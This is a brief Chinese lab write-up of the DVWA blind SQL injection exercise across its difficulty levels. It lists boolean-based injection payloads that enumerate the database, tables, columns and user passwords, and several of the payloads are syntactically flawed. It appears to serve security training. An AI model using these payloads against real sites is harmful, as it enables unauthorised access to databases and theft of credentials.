low
看看源代码,这里不支持报错注入,那看来只能用布尔和延时注入了
因为有回显,就直接用布尔注入了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| 1' and length(database())=4
1' and substr(database())<'m'(这里使用二分法)
1' and (select count (table_name) from information_schema.tables where table_schema=database() )=2
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #(猜表名的字符数)
1' and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<'m'
1' and (select count (column_name) from information_schema.columns where table_name='users' )=2 #(猜列的数量)
1' and substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))<'m'
1' and substr((select user_id,first_name,last_name,password from dvwa.users limit 0,1),2,1))<'m' #
|
medium
界面同sql-medium ,抓个包即可进行布尔和延时注入。
high
看了源码后发现,延时注入受到影响,使用布尔注入,打法同low,源码的设置与sql-high的相似。
impossible
还是PDO和Anti-CSRFtoken组合的方式,来提高安全性。
